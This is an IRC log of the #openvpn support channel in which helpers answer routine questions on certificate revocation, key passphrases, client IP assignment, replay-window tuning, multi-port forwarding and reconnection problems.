[~Ade@109.58.66.70.bredband.tre.se] has joined #openvpn 06:19 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has quit [Changing host] 06:19 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:27 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 06:28 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 255 seconds] 06:30 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 06:30 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 06:36 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn 06:37 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 240 seconds] 06:39 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 256 seconds] 06:42 -!- mh__ [~mh@dev.hollo.dk] has joined #openvpn 06:42 < mh__> hi.. im looking for a way to validate when my ssl cert expires remotely, is that possible somehow? 06:42 < mh__> i have been looking at the parameters that i can give openssl.. but cannot really find a way 06:43 < AsadH> What do you mean mh__? 06:43 < AsadH> Take a look at http://uk1.php.net/openssl_x509_parse 06:43 <@vpnHelper> Title: PHP: openssl_x509_parse - Manual (at uk1.php.net) 06:43 < mh__> AsadH: i would like my nagios server to monitor when my server cert of my openvpn server expires.. 06:43 < mh__> AsadH: thanks a lot 06:46 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [] 06:46 -!- Winterei- [~reise@205.185.126.190] has joined #openvpn 06:51 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 06:52 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:54 < mh__> hm.. but that requires that i have the public cert.. are there any way to get the cert from a remote host? that will be the first step.. 06:54 <@ecrist> no 06:56 -!- IT2 [~userit@86.120.191.55] has joined #openvpn 06:56 < mh__> okay.. that make my search a lot easier.. 
06:56 < AsadH> mh__ I think you can 06:57 <@ecrist> you need the certificate to check the expiration date. 06:57 <@ecrist> you could have a server-side client-connect script, though 06:57 <@ecrist> since that data is part of what's checked by openvpn 06:57 < AsadH> http://www.asadhaider.co.uk/test.php 06:57 < AsadH> gets google cert info 06:57 < AsadH> [validTo] => 130930235959Z 06:58 < mh__> AsadH: you did that with the openssl functions in php? 06:58 <@ecrist> AsadH: that's because google presents their certificate for connecting web clients 06:58 <@ecrist> openvpn clients don't present their certificate, since they're not listening for connections 06:58 < AsadH> oh, you mean openvpn certs? 06:58 < AsadH> Sorry :P 06:58 < AsadH> I don't even use openvpn 06:58 < mh__> AsadH: oh okay.. yes thats openvpn certs 06:58 <@ecrist> wtf are you here for, then, AsadH? 06:59 < AsadH> Oh, no. That's for SSL certs 06:59 < mh__> then the answer would be no.. well.. then i just have to make the check on the firewall 06:59 -!- IT2 is now known as Marius 06:59 -!- Marius is now known as Guest25156 06:59 < AsadH> ecrist: I'm planning to use it at some point :P I've only used openvpn-as 07:01 -!- Guest25156 [~userit@86.120.191.55] has left #openvpn [] 07:04 -!- Winterei- is now known as Wintereise 07:04 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 07:04 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 07:09 -!- mh__ [~mh@dev.hollo.dk] has left #openvpn [] 07:31 -!- niervol [~krystian@193.106.244.150] has quit [Read error: No route to host] 07:36 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 07:56 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 07:57 < khem_> is there some good way to monitor a OpenVPN service without running a management interface for each and every OpenVPN daemon, if i have several of them? 08:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 
08:04 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 08:04 < blackmagic> management interface? 08:05 < AsadH> he might mean access server 08:07 < con3x> SSH! 08:08 < con3x> :P 08:08 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 08:10 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 08:16 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 276 seconds] 08:18 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-63-56.adsl.proxad.net] has quit [Ping timeout: 248 seconds] 08:37 -!- gustavoz [~gustavoz@host110.190-225-90.telecom.net.ar] has joined #openvpn 08:47 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn 08:59 -!- d12fk [~heiko@exit0.net] has joined #openvpn 09:00 <@ecrist> khem_: no 09:00 <@ecrist> you need to monitor each process separately, or you need to monitor each processes status-log 09:01 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 09:14 <+pekster> fling: If you want to revoke a cert you've issued, you should use the revoke-full script, and then generate and publish the CRL to your server so the certificate can't be used by a client that no longer should connect 09:15 < fling> pekster: hmm hmm 09:16 < fling> pekster: what is CRL? 09:16 <+pekster> !crl 09:16 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that 09:16 <@vpnHelper> will create the CRL file for you. 
ssl-admin will also build a crl for you 09:21 -!- grass_ [pinne@46.246.119.109] has left #openvpn [] 09:23 -!- Daedy [~deed02392@ks353738.kimsufi.com] has quit [Read error: Operation timed out] 09:26 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 09:46 < AsadH> novaflash ! 09:46 < AsadH> novaflash novaflash novaflash http://i.imgur.com/ELGcY8x.jpg 09:48 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 09:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 09:51 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 09:52 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Operation timed out] 09:55 -!- Minnebo_ [~Minnebo@office.exabyte.be] has joined #openvpn 09:55 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Read error: Connection reset by peer] 09:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:12 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Ping timeout: 256 seconds] 10:12 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B52132.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 10:24 -!- master_of_master [~master_of@p57B5425D.dip.t-dialin.net] has joined #openvpn 10:27 -!- nimbius [~cicero@108-85-136-152.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 10:28 < nimbius> hi openvpn, i have a private key with a password. how can i supply it during connection? 10:28 < nimbius> !welcome 10:28 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 10:28 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:28 < nimbius> !goal i want to supply my private key password during connection 10:29 -!- MeanderingCode [~Meanderin@199.254.238.179] has joined #openvpn 10:29 <+pekster> nimbius: Normally the passphrase for an encrypted X509 key will be prompted for on STDIN; some frontends use the management interface to supply it using a method more suitable to the program (eg: a GUI window or such for a graphical frontend) 10:29 <+pekster> You can technically tell openvpn to get the passphrase from a text file, but doing so largely makes encrypting your key pointless since anyone who can find the config can see the path to the file with your plaintext passphrase 10:30 < nimbius> pekster: thanks. im using an init.d script that references my openvpn.conf for the office 10:31 <+pekster> Then pick a more suitable method since STDIN isn't normally exposed to the user during distro init processing. Maybe use the management interface and look at the '--management-hold' option until you manually give it the passphrase, or don't encrypt your key if you want it to automatically connect without user input 10:32 <+pekster> nimbius: References in the manpage for you to consider can be found in the following directives: --management, --management-hold, --management-client-auth, and --auth-user-pass 10:33 <+pekster> Or decrypting the key via 'openssl rsa -in encrypted.key -out unencrypted.key' 10:33 -!- Minnebo_ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds] 10:49 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 10:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 10:53 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:55 < nimbius> pekster: thanks for your help :) openvpn runs well now!
10:55 -!- nimbius [~cicero@108-85-136-152.lightspeed.irvnca.sbcglobal.net] has left #openvpn ["ahoi"] 10:57 -!- raidz_away is now known as raidz 10:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:02 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 11:02 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds] 11:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Read error: Operation timed out] 11:18 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 11:19 -!- Minnebo_ [~Minnebo@78-23-254-38.access.telenet.be] has joined #openvpn 11:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:23 -!- mode/#openvpn [+v s7r] by ChanServ 11:24 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 260 seconds] 11:24 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds] 11:25 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:26 -!- dazo is now known as dazo_afk 11:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:37 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 264 seconds] 11:37 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 11:37 -!- Champi [Champi@rootshell.fr] has quit [Ping timeout: 264 seconds] 11:37 -!- Champi [Champi@rootshell.fr] has joined #openvpn 11:38 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 11:38 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 11:41 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 11:42 -!- BtbN [~btbn@btbn.de] has joined #openvpn 11:42 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 11:43 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 11:47 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 11:49 -!- ade_b 
[~Ade@kista.guest.accome.com] has joined #openvpn 11:49 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:49 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:50 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 11:56 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 11:59 -!- combat7331 [~Mamba@d54C66165.access.telenet.be] has joined #openvpn 11:59 < combat7331> Hello 11:59 < combat7331> How can I randomly set the IP that is connected to with OpenVPN 11:59 -!- Netsplit *.net <-> *.split quits: @vpnHelper, clu5ter, b00gz_, dioz, ben1066, DBordello, Cybertinus, ngharo, KiNgMaR, |Mike| 11:59 -!- Netsplit over, joins: Cybertinus, clu5ter 11:59 < combat7331> Something like ISPs do, "Dynamic IP" 12:00 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-yssobzmevvtknuoq] has joined #openvpn 12:00 -!- AsadH is now known as zz_AsadH 12:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 12:01 <+pekster> combat7331: Are you asking about how to randomly connect to one of a number of profiles, or to hand out IPs from your server-side pool of IPs in a random fashion 12:07 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 12:10 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 12:10 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 12:10 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn 12:10 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:10 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 12:11 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 12:11 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 12:11 < combat7331> @pekster, just randomly every time a user connects a new IP. 12:11 <+pekster> I still don't understand. Randomize what?
I also don't understand "every time a user connects to a new IP" either 12:12 <+pekster> By default, OpenVPN already acts similar to DHCP in that a client only gets an IP from the server for as long as they remain connected 12:12 < combat7331> Every time a user connects to my OpenVPN server, it should assign that customer a random external IP. 12:12 <+pekster> If the user disconnects and reconnects, they may or may not get the same IP from the pool depending on pool availability 12:13 < combat7331> I am not referring to the internal IPs. More about the external IPs, that are assigned by the provider to me. 12:13 <+pekster> Okay, if you want that, you'll need to manage that in a --client-connect script and dynamically generate an 'ifconfig-push' value in the temp file that script is passed to marshal the desired "random" IP to a client 12:13 <+pekster> OpenVPN does not care about any external association you have 12:13 < combat7331> Ah yeah, right. 12:13 < combat7331> Thanks 12:14 <+pekster> If you're using RFC1918 IPs to clients, that's fine. If you're somehow binding those unroutable IPs to an external IP, you need to do that dynamically via whatever scripting method you choose to manage the association 12:14 <+pekster> OpenVPN can hand out public IPs too, just like with private IPs. You should of course own the IP block you're using if you do that 12:14 < combat7331> I do own that 12:15 <+pekster> OpenVPN manages the pool for you with 'ifconfig-pool'. You're free to manage it yourself, but then it's on you to figure out how to keep track of free vs in-use IPs from the range you pass to clients 12:15 < combat7331> how does that ifconfig-push thing work?
12:16 <+pekster> Check the manpage for --ifconfig-push and feel free to ask a specific question if you're still confused after reading the supplied documentation 12:17 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 12:18 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Remote host closed the connection] 12:21 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:43 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 12:43 -!- zz_AsadH is now known as AsadH 12:44 < Eagleman> Are there ways to improve the connection bandwidth when using redirect-gateway ? 12:45 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer] 12:46 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 12:47 < combat7331> !man 12:47 <+pekster> Eagleman: That depends completely on where your bottleneck is. You're going to be limited at a theoretical level to the bandwidth of the VPN link in such a case, plus whatever limits your server has on its uplink 12:48 < Eagleman> This is what currently happens, when i test the openvpn endpoint it reaches 80-80 Down-Up: http://imagebin.org/243705 12:48 <+pekster> That's not surprising. What is your server provisioned for? 12:48 < Eagleman> VPS 12:48 <+pekster> No, bandwidth-wise 12:49 <+pekster> Maybe you misunderstand how redirect-gateway works; all the client traffic is sent to the remote endpoint, and it then routes the traffic through that point on the Internet. You're limited both in terms of the VPN link itself and the aggregate of all traffic that host is generating against its provisioned limits 12:49 < Eagleman> pekster, just did a test: http://www.speedtest.net/result/2452448715.png 12:50 <+pekster> Oh, the server?
12:50 < Eagleman> yes 12:50 < Eagleman> It's higher than my current network 12:50 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 12:50 <+pekster> You can try increasing the --replay-window beyond default values 12:51 < Eagleman> 79 vs 57 down and 42 vs 5 up 12:51 <+pekster> You might be running into window-limitations on how many packets out the encrypted stream is willing to support 12:51 <+pekster> Try 2x or 4x the default packet value (you need that on both peers) and see if your situation improves after a client reconnect 12:52 < Eagleman> will try 12:52 <+pekster> CPU shouldn't be an issue, but you can rule it out by making sure you don't peg a core on either the client or server to verify it's not a problem there 12:52 < Eagleman> resource wise it's not even using enough worth to mention 12:53 < Eagleman> 2-3% increase of cpu power 12:53 <+pekster> Yea, that's usually the case unless you use embedded hardware or load a single-server instance up 12:54 < Eagleman> --replay-window n [t] You are talking about the default 64 in n ? 12:54 <+pekster> Yea. You can really leave t alone (it's optional anyway.)
Try 128 or 256 and see if results improve 12:55 <+pekster> If they do, see what the value after which you stop seeing improvement; you want to keep that "as low as feasible" because it limits replay attacks that can be performed, but too low and it'll interfere with packet delivery where the product of your bandwidth & latency is high (IIRC the manpage notes this too) 12:56 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 12:56 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 12:57 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 12:57 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 12:57 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 12:57 < Eagleman7> wow 12:58 < Eagleman7> The overhead is almost eliminated 12:58 < Eagleman7> http://www.speedtest.net/result/2452470216.png 12:58 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 255 seconds] 12:58 <+pekster> Part of the issue is a fairly high bandwidth your server has combined with a ~100ms increase in latency across the VPN 12:58 <+pekster> That's a non-trivial amount of latency given the bw you're pushing 12:59 < Eagleman7> Which issue? 12:59 < Eagleman7> I think i missed a part 12:59 <+pekster> Lower VPN bw versus link potential 12:59 < Eagleman7> [19:55] Ow, i am still on a tcp connection is when i disconnected 13:00 <+pekster> The manpage explains in plenty of detail what the option does at a technical level, but basically you're pushing packets so fast it's dropping them as detected "replay attack" packets. If you use 'verb 4' you can see those warnings in your logs too 13:00 < Eagleman7> That only happens with tcp ? 
13:01 <+pekster> It only happens with udp 13:01 <+pekster> (as the OpenVPN encapsulating protocol) 13:01 <+pekster> TCP has guaranteed delivery and ordering built into the protocol 13:01 < Eagleman7> hmm, i switched from tcp to udp and it eliminated the overhead 13:01 -!- Tomoyo [Wintereise@113.11.122.231] has joined #openvpn 13:02 -!- Tomoyo is now known as Guest88161 13:02 <+pekster> You don't want to use tcp as the ovpn protocol unless you need it for some reason 13:02 <+pekster> It's a waste of overhead and performs poorly when encapsulating another TCP stream inside 13:03 < Eagleman7> pekster the main reason i was using it is because my school is almost blocking every port, so i used 443 with tcp 13:03 <+pekster> I'll sometimes run a 2nd VPN server on some common TCP ports, but often you can get away with UDP on ports 53 or similarly common values 13:03 < EugeneKay> You can almost always find an open udp port 13:04 <+pekster> An IDS/DPI system will catch it, but it's not too common to find those on general-access networks 13:04 <+pekster> I tend to run 2 servers, one for UDP and another (backup-only) on TCP and just forward a slew of common ports if I'm not using them so I have good chance for remote access on abusive firewalls 13:05 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Ping timeout: 240 seconds] 13:06 < Eagleman7> Can't remember which ports are open, i am currently doing my internship so i can't test it out for a few weeks 13:06 < Eagleman7> But i will when i'm back 13:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 13:06 -!- mode/#openvpn [+o vpnHelper] by ChanServ 13:08 < Eagleman7> Should also setup my openvpn server to listen to multiple ports 13:08 <+pekster> OpenVPN won't do that; your firewall/NAT setup can enable it though 13:09 < Eagleman7> Multiple instances* 13:10 <+pekster> '-A PREROUTING -p udp -m multiport --dports 1194,53,66,67,161 -j DNAT --to-destination $IP_GOES_HERE:1194' or similar 13:10 -!- mdw 
[~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Quit: [self sleep]] 13:10 <+pekster> Sure, multiple instances too, but I'm not going to run dozens of instances just to get them exposed on multiple ports 13:10 < Eagleman7> Aha, thanks will save it 13:10 < Eagleman7> well i need at least to, one for udp and tcp right? 13:11 < Eagleman7> to=two 13:11 <+pekster> If you want both options, yes 13:11 <+pekster> So that's a minimum of 2 openvpn instances, one per protocol. Each needs its own unique network, but you can route between them if you'd like 13:11 <+pekster> (just set the firewall to do it and enable IP forwarding) 13:12 <+pekster> Erm, 67 & 68 was what I meant. I'm sure google can suggest other common ports too 13:13 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 244 seconds] 13:13 < ngharo> pekster: can I bounce an idea off you? Thinkin of making a VPN-only accessible web dashboard for my users to modify their routes. Toggle buttons to route out Tor transparent proxy and/or toggle button to route out another VPN tunnel. I'd need to make a sudo exception to allow httpd user to modify routes. Thoughts? 13:14 <+pekster> Why do that server-side? 
A client-side app can just as easily manage routes if that's your goal 13:15 <+pekster> Otherwise sure, CGI can be configured to use suexec or similar and set the UID/GID of the CGI to do what you need, or have it call a privilege-elevating command (such as via sudo or a suid binary) 13:16 <+pekster> Normally you limit the scope of such elevation as much as possible to limit the potential for a scripting error to an attacker looking to gain access 13:16 < ngharo> guess i'm thinking server-side so I don't have to write platform specific apps 13:16 < ngharo> i'm running a second apache instance bound to tun0 13:17 < combat7331> hello pekster 13:17 < combat7331> If i setup round robin DNS 13:17 < ngharo> still a bit nervous about running commands as root with user input, but my users *shouldn't* be messing around 13:17 <+pekster> Treat security on the httpd the same as you would normally, since you presumably don't want "any" VPN user able to abuse your system 13:17 < combat7331> will it show the same on the external ip. 13:17 <+pekster> Yea 13:17 < combat7331> ?* 13:18 <+pekster> combat7331: No clue. That's well outside the scope of OpenVPN at that point, and boils down to your implementation details 13:18 < ngharo> pekster: ok kewl. thanks, just wanted to make sure I wasn't crafting up a horrible idea 13:18 < combat7331> if i connect to IP "179.56.96.33" will it show as external IP that or the one that is assigned to the default internface? 13:19 < combat7331> interface* 13:19 <+pekster> It's only horrible if you implement it horribly ;) 13:19 < Eagleman7> Thanks for helping pekster, i have to generate some certificates now :). Cya 13:20 < combat7331> local 179.56.96.33-35 13:20 < combat7331> can i do that? 13:21 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has left #openvpn [] 13:21 <+pekster> combat7331: huh? No. What are you trying to do, exactly? 
--local is for binding the OpenVPN socket to a specific IP 13:22 < combat7331> Random external IP on connection 13:22 < combat7331> i tried via clientconnect 13:22 < combat7331> but I don't understand the ifconfig-push arguments 13:23 <+pekster> They're the same as the --ifconfig directive, but the server sends to the client 13:24 < combat7331> so I would do this in the client connect script: ifconfig-push 179.56.96.33 13:24 <+pekster> Okay, the manpage tells you that you need 2 arguments 13:24 <+pekster> So no. Supply the 2nd argument depending on your topology 13:25 < combat7331> ifconfig-push ? 13:25 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 13:25 * pekster sighs 13:25 <+pekster> OpenVPN is *not* responsible for tying a private IP to a public one 13:25 <+pekster> Do that yourself, using whatever firewall/NAT tools you prefer on your OS 13:25 < combat7331> that's not what I want 13:26 <+pekster> Bummer. OpenVPN can't magically maintain an external association outside of its own process 13:26 < combat7331> I just want that every time somebody connects to my VPN gets a different IP address externally that is shown to the internet. 13:26 <+pekster> I'd like OpenVPN to make me breakfast too, but it lacks support to do that 13:26 < Eagleman7> Any idea why all my internet browsers stop working after i disconnect the openvpn connection? I can nslookup and ping everything just fine, and restarting the web browser does not help either, i'm on windows 13:27 <+pekster> combat7331: Then go develop a solution to do that. Write some code to make the association between the rfc1918 space you're giving clients, or give them a public IP directly via some code you write to get a random assignment and route traffic to them 13:27 <+pekster> Either way you need to WRITE YOUR OWN CODE to do that. 
I'm not going to work for free for your business 13:27 <+pekster> OpenVPN does *not* support what you're asking out of the box 13:27 <+pekster> So, go do what business owners do and develop a solution to your problem 13:28 < combat7331> Sure, thanks for the help though :) 13:29 < Eagleman7> Any idea why all my internet browsers keep saying cannot make a connection [ WEBSITE ] after i disconnect the openvpn connection? I can nslookup and ping everything just fine, and restarting the web browser does not help either, i'm on windows 13:30 <+pekster> browser proxy perhaps? If you can ping the same target you can't browse to, either the browser is misconfigured to connect via the same path, or some firewall is blocking the access (or the host is simply down) 13:31 <+pekster> Doesn't sound like an OpenVPN problem if you can reach the host via other protocols/programs 13:34 < Eagleman7> I go with a restart then 13:34 < Eagleman7> I can't troubleshoot browsers 13:35 -!- combat7331 [~Mamba@d54C66165.access.telenet.be] has quit [] 13:41 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 13:52 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 14:00 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 14:00 -!- MeanderingCode [~Meanderin@199.254.238.179] has quit [Ping timeout: 252 seconds] 14:01 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 14:08 -!- dazo_afk is now known as dazo 14:18 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 14:34 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 
14:35 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 14:36 -!- Orbi [~opera@anon-186-58.vpn.ipredator.se] has joined #openvpn 14:39 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 14:40 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 14:51 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:55 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 15:00 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 15:06 < dioz> haha 15:32 < Orbi> Hi, after a pppoe reset OpenVPN does not always reestablish connection. I want to re-launch openvpn with a bash script. Is it possible to capture the 'Initialization Sequence Completed' message of OpenVPN to use it in the script? 15:40 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 264 seconds] 15:43 < kisom> Orbi: You should just let openvpn handle the reconnection. Check the logs and see why it does not reconnect. 15:43 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 15:45 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:48 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 15:50 < Orbi> It is a DNS problem, the client cannot resolve the host address. 15:51 -!- Minnebo_ [~Minnebo@78-23-254-38.access.telenet.be] has quit [Ping timeout: 248 seconds] 15:52 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:53 < dioz> i'll just troll and say... set the ip address in the .ovpn ? 
15:53 -!- dydzEz2__ [~dydzEz2@2601:d:4a80:72:5d05:b2a0:d5f9:d9ad] has joined #openvpn 15:54 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 15:56 -!- dydzEz2_ [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 252 seconds] 15:56 < Orbi> I could, but I'd say it doesn't play nice with dnsmasq. Since I have several computers on the network and OpenVPN runs on the router, every computer on the network has DNS problems. 15:58 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:59 <+pekster> How is that related to openvpn? Use the IP if DNS isn't available when you (re)connect. Otherwise each time a connection is attempted after any timeout, the process will attempt to resolve any DNS name in the 'remote' directive on each connect attempt (pursuant to any --resolv-retry setting, which defaults to "infinite") 15:59 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 245 seconds] 15:59 <+pekster> I fail to see how a pppoe event (even if you get a new IP) prevents you from performing a DNS lookup 16:01 < Orbi> I don't know how it is related, that's what I'm trying to figure out. If openvpn is killed before the pppoe connection reset, DNS lookup is fine. 16:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [] 16:15 -!- Orbi [~opera@anon-186-58.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 16:26 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:33 -!- Orbi [~opera@anon-185-71.vpn.ipredator.se] has joined #openvpn 16:38 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 16:39 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 16:40 <+pekster> Orbi: It might be binding to the interface that gets torn down. 
